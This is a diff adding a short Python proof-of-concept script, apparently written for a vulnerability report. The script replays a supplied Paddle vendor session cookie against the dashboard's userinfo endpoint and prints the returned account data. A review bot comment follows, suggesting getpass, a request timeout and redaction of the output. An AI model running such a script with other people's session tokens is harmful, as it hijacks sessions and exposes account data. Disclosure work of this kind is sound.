diff --git a/exploit_poc.py b/exploit_poc.py
new file mode 100644
index 0000000..c238311
--- /dev/null
+++ b/exploit_poc.py
@@ -0,0 +1,30 @@
+import requests
+from rich.table import Table
+from rich.console import Console
+
+TOKEN = input("Insert paddle_session_vendor token: ")
+
+headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
+ "Accept": "*/*",
+ "Referer": "https://vendors.paddle.com/dashboard",
+}
+
+cookies = {
+ "paddle_session_vendor": TOKEN
+}
+
+response = requests.get("https://vendors.paddle.com/dashboard/api/userinfo", headers=headers, cookies=cookies)
+
+if response.status_code == 200:
+ data = response.json()
+ console = Console()
+ table = Table(title="Paddle /userinfo", show_header=True, header_style="bold cyan")
+ table.add_column("Field", style="bold white", no_wrap=True)
+ table.add_column("Value", style="green")
+ for key, value in data.items():
+ table.add_row(str(key), str(value))
+ console.print(table)
+else:
+ print(f"[!] Failed — Status: {response.status_code}")
+ print(response.json())
\ No newline at end of file
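Review bot: The session cookie is read with `input()` at the top of the script, so the `paddle_session_vendor` value is echoed to the terminal and stays in scrollback or any session recording; `TOKEN = getpass.getpass("Insert paddle_session_vendor token: ")` (with `import getpass`) avoids that. The `requests.get(...)` call has no `timeout=`, so the script can hang indefinitely on a stalled connection; passing `timeout=10` bounds it. In the `else` branch `print(response.json())` raises on a non-JSON error body (an HTML error or login page, for instance), which hides the status line's context; `print(response.text)` is the safer fallback. The success path prints every field of the response, which presumably includes account data, so output attached to a report should be redacted first.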